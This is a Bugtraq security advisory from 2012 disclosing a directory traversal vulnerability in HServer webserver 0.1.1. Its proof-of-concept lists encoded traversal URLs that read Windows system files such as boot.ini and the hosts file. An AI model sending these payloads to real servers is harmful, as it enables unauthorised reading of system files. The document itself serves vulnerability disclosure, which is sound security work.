[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

HServer webserver - Directory Traversal Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: HServer webserver - Directory Traversal Vulnerability
From: demonalex@xxxxxxx
Date: Thu, 5 Jan 2012 06:07:56 GMT

Title: HServer webserver - Directory Traversal Vulnerability

Software : HServer webserver

Software Version : 0.1.1

Vendor: http://www.luizpicanco.com/index.php?s=hserver
        http://code.google.com/p/hserver/

Vulnerability Published : 2012-01-05

Vulnerability Update Time :

Status :

Impact : High

Bug Description :
HServer webserver(version update : 0.1.1) is a tiny Web server written in Java, 
it is vulnerable with Directory Traversal Vulnerability.

Proof Of Concept :
http://127.0.0.1:8081/..%5c..%5c..%5cboot.ini
http://127.0.0.1:8081/..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
http://127.0.0.1:8081/%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
http://127.0.0.1:8081/%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts

Credits : This vulnerability was discovered by demonalex@xxxxxxx
mail: demonalex@xxxxxxx / ChaoYi.Huang@xxxxxxxxxxxxxxxx
Pentester/Researcher
Dark2S Security Team/PolyU.HK

Prev by Date: Revised IETF I-D: Advice on IPv6 RA-Guard Implementation
Next by Date: NGS00109 Technical Advisory: Remote Code Execution in ImpressPages CMS
Previous by thread: Revised IETF I-D: Advice on IPv6 RA-Guard Implementation
Next by thread: NGS00109 Technical Advisory: Remote Code Execution in ImpressPages CMS
Index(es):
- Date
- Thread